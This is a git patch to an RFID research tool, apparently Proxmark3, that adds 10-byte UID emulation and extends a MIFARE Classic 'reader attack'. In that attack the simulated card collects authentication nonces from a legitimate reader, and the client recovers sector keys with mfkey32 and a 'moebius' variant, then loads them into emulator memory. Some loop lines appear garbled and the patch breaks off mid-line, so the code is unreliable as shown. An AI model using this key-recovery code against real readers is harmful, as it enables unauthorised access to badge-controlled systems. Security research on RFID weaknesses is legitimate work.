From c872d8c1773591e976a508755ce43664f4083da6 Mon Sep 17 00:00:00 2001 From: marshmellow42 Date: Fri, 24 Jun 2016 01:31:27 -0400 Subject: [PATCH] update hf mf sim x attack mode - start 10byte uid.. ..support (some from @iceman1001) (sim reader attack currently testing std mfkey32 vs mfkey32_moebius version...) possibly will remove one later. --- armsrc/iso14443a.c | 318 ++++++++++++++++++++++++++--------- armsrc/mifareutil.h | 17 +- client/cmdhfmf.c | 189 ++++++++++++--------- client/nonce2key/nonce2key.c | 137 +++++++++++++-- client/nonce2key/nonce2key.h | 20 ++- client/util.c | 3 + client/util.h | 1 + common/protocols.h | 15 +- include/usb_cmd.h | 9 +- 9 files changed, 512 insertions(+), 197 deletions(-) diff --git a/armsrc/iso14443a.c b/armsrc/iso14443a.c index 4f0a990f..7b7314dd 100644 --- a/armsrc/iso14443a.c +++ b/armsrc/iso14443a.c @@ -15,12 +15,13 @@ #include "util.h" #include "string.h" #include "cmd.h" - #include "iso14443crc.h" #include "iso14443a.h" #include "crapto1.h" #include "mifareutil.h" #include "BigBuf.h" +#include "protocols.h" + static uint32_t iso14a_timeout; int rsamples = 0; uint8_t trigger = 0; @@ -2324,14 +2325,17 @@ typedef struct { * *@param flags : * FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK - * 4B_FLAG_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that - * 7B_FLAG_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that + * FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that + * FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that + * FLAG_10B_UID_IN_DATA - use 10-byte UID in the data-section not finished * FLAG_NR_AR_ATTACK - means we should collect NR_AR responses for bruteforcing later - *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is inifite + *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ... + * (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted) */ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain) { int cardSTATE = MFEMUL_NOFIELD; + int _UID_LEN = 0; // 4, 7, 10 int _7BUID = 0; int vHf = 0; // in mV int res; @@ -2359,24 +2363,31 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!! + uint8_t rUIDBCC3[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; + uint8_t rSAK[] = {0x08, 0xb6, 0xdd}; uint8_t rSAK1[] = {0x04, 0xda, 0x17}; + uint8_t rSAK2[] = {0x04, 0xda, 0x17}; //need to look up uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04}; uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00}; //Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2 - // This can be used in a reader-only attack. - // (it can also be retrieved via 'hf 14a list', but hey... - - //allow collecting up to 4 sets of nonces to allow recovery of 4 keys (2 keyA & 2 keyB) - // must be set in multiples of 2 (for 1 keyA and 1 keyB) - #define ATTACK_KEY_COUNT 4 - nonces_t ar_nr_resp[ATTACK_KEY_COUNT]; + // This will be used in the reader-only attack. + + //allow collecting up to 8 sets of nonces to allow recovery of 8 keys + #define ATTACK_KEY_COUNT 8 + nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp)); - uint8_t ar_nr_collected[ATTACK_KEY_COUNT]; + uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2]; memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected)); + bool collectMoebius = false; + uint8_t nonce1_count = 0; + uint8_t nonce2_count = 0; + uint8_t moebius_n_count = 0; + uint8_t mM = 0; //moebius_modifier for collection storage + // Authenticate response - nonce uint32_t nonce = bytes_to_num(rAUTH_NT, 4); @@ -2388,45 +2399,98 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * // 4B uid comes from data-portion of packet memcpy(rUIDBCC1,datain,4); rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; - + _UID_LEN = 4; } else if (flags & FLAG_7B_UID_IN_DATA) { // 7B uid comes from data-portion of packet memcpy(&rUIDBCC1[1],datain,3); memcpy(rUIDBCC2, datain+3, 4); _7BUID = true; + _UID_LEN = 7; + } else if (flags & FLAG_10B_UID_IN_DATA) { + memcpy(&rUIDBCC1[1], datain, 3); + memcpy(&rUIDBCC2[1], datain+3, 3); + memcpy( rUIDBCC3, datain+6, 4); + _UID_LEN = 10; } else { - // get UID from emul memory + // get UID from emul memory - guess at length emlGetMemBt(receivedCmd, 7, 1); _7BUID = !(receivedCmd[0] == 0x00); if (!_7BUID) { // ---------- 4BUID emlGetMemBt(rUIDBCC1, 0, 4); + _UID_LEN = 4; } else { // ---------- 7BUID emlGetMemBt(&rUIDBCC1[1], 0, 3); emlGetMemBt(rUIDBCC2, 3, 4); + _UID_LEN = 7; } } - /* - * Regardless of what method was used to set the UID, set fifth byte and modify - * the ATQA for 4 or 7-byte UID - */ - rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; - if (_7BUID) { - rATQA[0] = 0x44; - rUIDBCC1[0] = 0x88; - rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; - rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3]; - } - - if (MF_DBGLEVEL >= 1) { - if (!_7BUID) { - Dbprintf("4B UID: %02x%02x%02x%02x", - rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]); - } else { - Dbprintf("7B UID: (%02x)%02x%02x%02x%02x%02x%02x%02x", - rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3], - rUIDBCC2[0], rUIDBCC2[1] ,rUIDBCC2[2], rUIDBCC2[3]); - } + switch (_UID_LEN) { + case 4: + // save CUID + cuid = bytes_to_num(rUIDBCC1, 4); + // BCC + rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; + if (MF_DBGLEVEL >= 2) { + Dbprintf("4B UID: %02x%02x%02x%02x", + rUIDBCC1[0], + rUIDBCC1[1], + rUIDBCC1[2], + rUIDBCC1[3] + ); + } + break; + case 7: + rATQA[0] |= 0x40; + // save CUID + cuid = bytes_to_num(rUIDBCC2, 4); + // CascadeTag, CT + rUIDBCC1[0] = 0x88; + // BCC + rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; + rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3]; + if (MF_DBGLEVEL >= 2) { + Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x", + rUIDBCC1[1], + rUIDBCC1[2], + rUIDBCC1[3], + rUIDBCC2[0], + rUIDBCC2[1], + rUIDBCC2[2], + rUIDBCC2[3] + ); + } + break; + case 10: + rATQA[0] |= 0x80; + //sak_10[0] &= 0xFB; + // save CUID + cuid = bytes_to_num(rUIDBCC3, 4); + // CascadeTag, CT + rUIDBCC1[0] = 0x88; + rUIDBCC2[0] = 0x88; + // BCC + rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; + rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3]; + rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3]; + + if (MF_DBGLEVEL >= 2) { + Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x", + rUIDBCC1[1], + rUIDBCC1[2], + rUIDBCC1[3], + rUIDBCC2[1], + rUIDBCC2[2], + rUIDBCC2[3], + rUIDBCC3[0], + rUIDBCC3[1], + rUIDBCC3[2], + rUIDBCC3[3] + ); + } + break; + default: + break; } // We need to listen to the high-frequency, peak-detected path. @@ -2439,9 +2503,8 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * clear_trace(); set_tracing(TRUE); - bool finished = FALSE; - while (!BUTTON_PRESS() && !finished) { + while (!BUTTON_PRESS() && !finished && !usb_poll_validate_length()) { WDT_HIT(); // find reader field @@ -2452,10 +2515,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * LED_A_ON(); } } - if(cardSTATE == MFEMUL_NOFIELD) continue; + if (cardSTATE == MFEMUL_NOFIELD) continue; //Now, get data - res = EmGetCmd(receivedCmd, &len, receivedCmd_par); if (res == 2) { //Field is off! cardSTATE = MFEMUL_NOFIELD; @@ -2466,9 +2528,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * } // REQ or WUP request in ANY state and WUP in HALTED state - if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) { + if (len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) { selTimer = GetTickCount(); - EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52)); + EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == ISO14443A_CMD_WUPA)); cardSTATE = MFEMUL_SELECT1; // init crypto block @@ -2499,21 +2561,54 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]); } // select card + // check correct sak values... (marshmellow) if (len == 9 && (receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) { - EmSendCmd(_7BUID?rSAK1:rSAK, _7BUID?sizeof(rSAK1):sizeof(rSAK)); - cuid = bytes_to_num(rUIDBCC1, 4); - if (!_7BUID) { - cardSTATE = MFEMUL_WORK; - LED_B_ON(); - if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer); - break; - } else { - cardSTATE = MFEMUL_SELECT2; + switch(_UID_LEN) { + case 4: + cardSTATE = MFEMUL_WORK; + LED_B_ON(); + if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer); + EmSendCmd(rSAK, sizeof(rSAK)); + break; + case 7: + cardSTATE = MFEMUL_SELECT2; + EmSendCmd(rSAK1, sizeof(rSAK1)); + break; + case 10: + cardSTATE = MFEMUL_SELECT2; + EmSendCmd(rSAK2, sizeof(rSAK2)); + break; + default:break; } + } else { + cardSTATE_TO_IDLE(); } break; } + case MFEMUL_SELECT3:{ + if (!len) { + LogTrace(Uart.output, Uart.len, Uart.startTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.endTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, TRUE); + break; + } + if (len == 2 && (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && receivedCmd[1] == 0x20)) { + EmSendCmd(rUIDBCC3, sizeof(rUIDBCC3)); + break; + } + if (len == 9 && + (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && + receivedCmd[1] == 0x70 && + memcmp(&receivedCmd[2], rUIDBCC3, 4) == 0) ) { + + EmSendCmd(rSAK2, sizeof(rSAK2)); + cardSTATE = MFEMUL_WORK; + LED_B_ON(); + if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol3 time: %d", GetTickCount() - selTimer); + break; + } + cardSTATE_TO_IDLE(); + break; + } case MFEMUL_AUTH1:{ if( len != 8) { @@ -2522,43 +2617,67 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * break; } - uint32_t ar = bytes_to_num(receivedCmd, 4); - uint32_t nr = bytes_to_num(&receivedCmd[4], 4); + uint32_t nr = bytes_to_num(receivedCmd, 4); + uint32_t ar = bytes_to_num(&receivedCmd[4], 4); - //Collect AR/NR per key/sector + //Collect AR/NR per keytype & sector if(flags & FLAG_NR_AR_ATTACK) { for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) { - if(cardAUTHKEY > 0 && i < (ATTACK_KEY_COUNT/2) ) { - i=ATTACK_KEY_COUNT/2; //keyB skip to keyB - } else if (cardAUTHKEY == 0 && i == ATTACK_KEY_COUNT/2) { - break; //should not get here - quit - } - // if first auth for sector, or matches sector of previous auth - if ( ar_nr_collected[i]==0 || (cardAUTHSC == ar_nr_resp[i].sector && ar_nr_collected[i] > 0) ) { - if(ar_nr_collected[i] < 2) { - if(ar_nr_resp[ar_nr_collected[i]].ar != ar) - {// Avoid duplicates... probably not necessary, ar should vary. - if (ar_nr_collected[i]==0) { - ar_nr_resp[i].cuid = cuid; - ar_nr_resp[i].sector = cardAUTHSC; - ar_nr_resp[i].nonce = nonce; - ar_nr_resp[i].ar = ar; - ar_nr_resp[i].nr = nr; - } else { - ar_nr_resp[i].ar2 = ar; - ar_nr_resp[i].nr2 = nr; + if ( ar_nr_collected[i+mM]==0 || (cardAUTHSC == ar_nr_resp[i+mM].sector && cardAUTHKEY == ar_nr_resp[i+mM].keytype && ar_nr_collected[i+mM] > 0) ) { + // if first auth for sector, or matches sector and keytype of previous auth + if (ar_nr_collected[i+mM] < 2) { + // if we haven't already collected 2 nonces for this sector + if (ar_nr_resp[ar_nr_collected[i+mM]].ar != ar) { + // Avoid duplicates... probably not necessary, ar should vary. + if (ar_nr_collected[i+mM]==0) { + // first nonce collect + ar_nr_resp[i+mM].cuid = cuid; + ar_nr_resp[i+mM].sector = cardAUTHSC; + ar_nr_resp[i+mM].keytype = cardAUTHKEY; + ar_nr_resp[i+mM].nonce = nonce; + ar_nr_resp[i+mM].nr = nr; + ar_nr_resp[i+mM].ar = ar; + nonce1_count++; + //add this nonce to first moebius nonce + ar_nr_resp[i+ATTACK_KEY_COUNT].cuid = cuid; + ar_nr_resp[i+ATTACK_KEY_COUNT].sector = cardAUTHSC; + ar_nr_resp[i+ATTACK_KEY_COUNT].keytype = cardAUTHKEY; + ar_nr_resp[i+ATTACK_KEY_COUNT].nonce = nonce; + ar_nr_resp[i+ATTACK_KEY_COUNT].nr = nr; + ar_nr_resp[i+ATTACK_KEY_COUNT].ar = ar; + ar_nr_collected[i+ATTACK_KEY_COUNT]++; + } else { //second nonce collect (std and moebius) + ar_nr_resp[i+mM].nonce2 = nonce; + ar_nr_resp[i+mM].nr2 = nr; + ar_nr_resp[i+mM].ar2 = ar; + if (!collectMoebius) { + nonce2_count++; + //check if this was the last second nonce we need for std attack + if ( nonce2_count == nonce1_count ) { + //done collecting std test switch to moebius + collectMoebius = true; + mM = ATTACK_KEY_COUNT; + nonce = nonce*7; + } + } else { + moebius_n_count++; + //if we've collected all the nonces we need - finish. + if (nonce1_count == moebius_n_count) finished = true; + } } - ar_nr_collected[i]++; + ar_nr_collected[i+mM]++; break; } + } else { //already collected 2 nonces for sector - reader looping? - quit + //finished = true; } } } } - + // --- crypto - crypto1_word(pcs, ar , 1); - cardRr = nr ^ crypto1_word(pcs, 0, 0); + crypto1_word(pcs, nr , 1); + cardRr = ar ^ crypto1_word(pcs, 0, 0); // test if auth OK if (cardRr != prng_successor(nonce, 64)){ @@ -2600,11 +2719,19 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * // select 2 card if (len == 9 && (receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) { + //which sak now? (marshmellow) EmSendCmd(rSAK, sizeof(rSAK)); - cuid = bytes_to_num(rUIDBCC2, 4); - cardSTATE = MFEMUL_WORK; - LED_B_ON(); - if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer); + switch(_UID_LEN) { + case 7: + cardSTATE = MFEMUL_WORK; + LED_B_ON(); + if (MF_DBGLEVEL >= 4) Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer); + break; + case 10: + cardSTATE = MFEMUL_SELECT3; + break; + default:break; + } break; } @@ -2632,11 +2759,20 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * } if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) { + if (receivedCmd[1] >= 16 * 4) { + //is this the correct response to an auth on a out of range block? marshmellow + EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA)); + if (MF_DBGLEVEL >= 2) Dbprintf("Reader tried to operate (0x%02x) on out of range block: %d (0x%02x), nacking",receivedCmd[0],receivedCmd[1],receivedCmd[1]); + break; + } + authTimer = GetTickCount(); cardAUTHSC = receivedCmd[1] / 4; // received block num cardAUTHKEY = receivedCmd[0] - 0x60; crypto1_destroy(pcs);//Added by martin crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY)); + //uint64_t key=emlGetKey(cardAUTHSC, cardAUTHKEY); + //Dbprintf("key: %04x%08x",(uint32_t)(key>>32)&0xFFFF,(uint32_t)(key&0xFFFFFFFF)); if (!encrypted_data) { // first authentication if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY ); @@ -2826,19 +2962,33 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t * Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x", ar_nr_resp[i].cuid, //UID ar_nr_resp[i].nonce, //NT - ar_nr_resp[i].ar, //AR1 ar_nr_resp[i].nr, //NR1 - ar_nr_resp[i].ar2, //AR2 - ar_nr_resp[i].nr2 //NR2 + ar_nr_resp[i].ar, //AR1 + ar_nr_resp[i].nr2, //NR2 + ar_nr_resp[i].ar2 //AR2 ); } } + for ( uint8_t i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT*2; i++) { + if (ar_nr_collected[i] == 2) { + Dbprintf("Collected two pairs of AR/NR which can be used to extract %s from reader for sector %d:", (i= 1) Dbprintf("Emulator stopped. Tracing: %d trace length: %d ", tracing, BigBuf_get_traceLen()); if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK { - //May just aswell send the collected ar_nr in the response aswell + //Send the collected ar_nr in the response cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp)); } diff --git a/armsrc/mifareutil.h b/armsrc/mifareutil.h index 7a09ce64..3d4dd400 100644 --- a/armsrc/mifareutil.h +++ b/armsrc/mifareutil.h @@ -42,14 +42,15 @@ extern int MF_DBGLEVEL; #define MFEMUL_IDLE 1 #define MFEMUL_SELECT1 2 #define MFEMUL_SELECT2 3 -#define MFEMUL_AUTH1 4 -#define MFEMUL_AUTH2 5 -#define MFEMUL_WORK 6 -#define MFEMUL_WRITEBL2 7 -#define MFEMUL_INTREG_INC 8 -#define MFEMUL_INTREG_DEC 9 -#define MFEMUL_INTREG_REST 10 -#define MFEMUL_HALTED 11 +#define MFEMUL_SELECT3 4 +#define MFEMUL_AUTH1 5 +#define MFEMUL_AUTH2 6 +#define MFEMUL_WORK 7 +#define MFEMUL_WRITEBL2 8 +#define MFEMUL_INTREG_INC 9 +#define MFEMUL_INTREG_DEC 10 +#define MFEMUL_INTREG_REST 11 +#define MFEMUL_HALTED 12 #define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF(); diff --git a/client/cmdhfmf.c b/client/cmdhfmf.c index df504416..4b82e698 100644 --- a/client/cmdhfmf.c +++ b/client/cmdhfmf.c @@ -1016,64 +1016,81 @@ int CmdHF14AMfChk(const char *Cmd) return 0; } +int usage_hf14_mf1ksim(void){ + PrintAndLog("Usage: hf mf sim [h] u n i x"); + PrintAndLog("options:"); + PrintAndLog(" h this help"); + PrintAndLog(" u (Optional) UID 4,7 bytes. If not specified, the UID 4b from emulator memory will be used"); + PrintAndLog(" n (Optional) Automatically exit simulation after blocks have been read by reader. 0 = infinite"); + PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted"); + PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)"); + PrintAndLog(" e (Optional) set keys found from 'reader attack' to emulator memory"); + PrintAndLog("samples:"); + PrintAndLog(" hf mf sim u 0a0a0a0a"); + PrintAndLog(" hf mf sim u 11223344556677"); + //PrintAndLog(" hf mf sim u 112233445566778899AA"); + return 0; +} + int CmdHF14AMf1kSim(const char *Cmd) { - uint8_t uid[7] = {0, 0, 0, 0, 0, 0, 0}; + #define ATTACK_KEY_COUNT 8 + uint8_t uid[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; uint8_t exitAfterNReads = 0; uint8_t flags = 0; + int uidlen = 0; + uint8_t pnr = 0; + bool setEmulatorMem = false; - uint8_t cmdp = param_getchar(Cmd, 0); + char cmdp = param_getchar(Cmd, pnr); - if (cmdp == 'h' || cmdp == 'H') { - PrintAndLog("Usage: hf mf sim u n i x"); - PrintAndLog(" h this help"); - PrintAndLog(" u (Optional) UID. If not specified, the UID from emulator memory will be used"); - PrintAndLog(" n (Optional) Automatically exit simulation after blocks have been read by reader. 0 = infinite"); - PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted"); - PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)"); - PrintAndLog(""); - PrintAndLog(" sample: hf mf sim u 0a0a0a0a "); - return 0; - } - uint8_t pnr = 0; - if (param_getchar(Cmd, pnr) == 'u') { - if(param_gethex(Cmd, pnr+1, uid, 8) == 0) - { - flags |= FLAG_4B_UID_IN_DATA; // UID from packet - } else if(param_gethex(Cmd,pnr+1,uid,14) == 0) { - flags |= FLAG_7B_UID_IN_DATA;// UID from packet - } else { - PrintAndLog("UID, if specified, must include 8 or 14 HEX symbols"); - return 1; + if (cmdp == 'h' || cmdp == 'H') return usage_hf14_mf1ksim(); + + if (cmdp == 'u' || cmdp == 'U') { + param_gethex_ex(Cmd, pnr+1, uid, &uidlen); + switch(uidlen){ + //case 20: flags = FLAG_10B_UID_IN_DATA; break; //not complete + case 14: flags = FLAG_7B_UID_IN_DATA; break; + case 8: flags = FLAG_4B_UID_IN_DATA; break; + default: return usage_hf14_mf1ksim(); } pnr +=2; } - if (param_getchar(Cmd, pnr) == 'n') { - exitAfterNReads = param_get8(Cmd,pnr+1); + + cmdp = param_getchar(Cmd, pnr); + if (cmdp == 'n' || cmdp == 'N') { + exitAfterNReads = param_get8(Cmd, pnr+1); pnr += 2; } - if (param_getchar(Cmd, pnr) == 'i' ) { - //Using a flag to signal interactiveness, least significant bit + + cmdp = param_getchar(Cmd, pnr); + if (cmdp == 'i' || cmdp == 'I' ) { flags |= FLAG_INTERACTIVE; pnr++; } - if (param_getchar(Cmd, pnr) == 'x' ) { - //Using a flag to signal interactiveness, least significant bit + cmdp = param_getchar(Cmd, pnr); + if (cmdp == 'x' || cmdp == 'X') { flags |= FLAG_NR_AR_ATTACK; } + + cmdp = param_getchar(Cmd, pnr); + if (cmdp == 'e' || cmdp == 'E') { + setEmulatorMem = true; + } + PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ", flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4): - flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A" + flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A" , exitAfterNReads, flags,flags); UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}}; memcpy(c.d.asBytes, uid, sizeof(uid)); + clearCommandBuffer(); SendCommand(&c); - if(flags & FLAG_INTERACTIVE) - { + if(flags & FLAG_INTERACTIVE) { UsbCommand resp; PrintAndLog("Press pm3-button to abort simulation"); while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) { @@ -1082,61 +1099,79 @@ int CmdHF14AMf1kSim(const char *Cmd) } //got a response if (flags & FLAG_NR_AR_ATTACK) { - typedef struct { - uint32_t cuid; - uint8_t sector; - uint8_t keytype; - uint32_t nonce; - uint32_t ar; - uint32_t nr; - uint32_t nonce2; - uint32_t ar2; - uint32_t nr2; - } nonces_t; - nonces_t ar_resp[4]; - //uint32_t ar_responses[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}; + nonces_t ar_resp[ATTACK_KEY_COUNT*2]; uint64_t key = 0; - //uint64_t keyB = 0; - //uint8_t arnr_len = 8; memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp)); - - for (uint8_t i = 0; i<4; i++) { + typedef struct { + uint64_t keyA; + uint32_t security; + uint64_t keyB; + } st_t; + st_t sector_trailer[ATTACK_KEY_COUNT]; + memset(sector_trailer, 0x00, sizeof(sector_trailer)); + + uint8_t stSector[ATTACK_KEY_COUNT]; + memset(stSector, 0x00, sizeof(stSector)); + uint8_t key_cnt[ATTACK_KEY_COUNT]; + memset(key_cnt, 0x00, sizeof(key_cnt)); + + for (uint8_t i = 0; i 0) { - key = mfkey32(ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2); - if (key>0) { - PrintAndLog("\nFound Key%s for sector %d: [%04x%08x]", (i<2) ? "A" : "B", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF)); - //set emulator memory for key - } + //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, ar %08x, nr %08x, ar2 %08x, nr2 %08x",ar_resp[i].sector, ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2); + if (mfkey32(ar_resp[i], &key)) { + PrintAndLog("Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF)); + + for (uint8_t ii = 0; ii0) { - PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF)); - //set emulator memory for key - } else { - keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]); - if (keyA>0) { - PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF)); - //set emulator memory for key + //set emulator memory for keys + if (setEmulatorMem) { + for (uint8_t i = 0; i0) { + //PrintAndLog ("block %d, keyA:%04x%08x, keyb:%04x%08x",stSector[i]*4+3, (uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF)); + uint8_t memBlock[16]; + memset(memBlock, 0x00, sizeof(memBlock)); + char cmd1[36]; + memset(cmd1,0x00,sizeof(cmd1)); + snprintf(cmd1,sizeof(cmd1),"%04x%08xFF078069%04x%08x",(uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF)); + //PrintAndLog("%s",cmd1); + if (param_gethex(cmd1, 0, memBlock, 32)) { + PrintAndLog("block data must include 32 HEX symbols"); + return 1; + } + + UsbCommand c = {CMD_MIFARE_EML_MEMSET, {(stSector[i]*4+3), 1, 0}}; + memcpy(c.d.asBytes, memBlock, 16); + clearCommandBuffer(); + SendCommand(&c); } } - } else { - PrintAndLog("keyA response error: %d %d %d %d %d",ar_responses[1] , ar_responses[2] , ar_responses[3] , ar_responses[6] , ar_responses[7]); } - if (ar_responses[1] && ar_responses[2+arnr_len] && ar_responses[3+arnr_len] && ar_responses[6+arnr_len] && ar_responses[7+arnr_len]) { - keyB = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2+arnr_len],ar_responses[3+arnr_len],ar_responses[6+arnr_len],ar_responses[7+arnr_len]); - if (keyB>0) { - PrintAndLog("\nFound KeyB: [%04x%08x]\n\n", (uint32_t) (keyB>>32), (uint32_t) (keyB & 0xFFFFFFFF)); - //set emulator memory for key + //moebius attack + for (uint8_t i = ATTACK_KEY_COUNT; i 0) { + if (tryMfk32_moebius(ar_resp[i], &key)) { + PrintAndLog("M-Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF)); + } } } - if (keyA || keyB) { - //TODO retry sim with new keys in 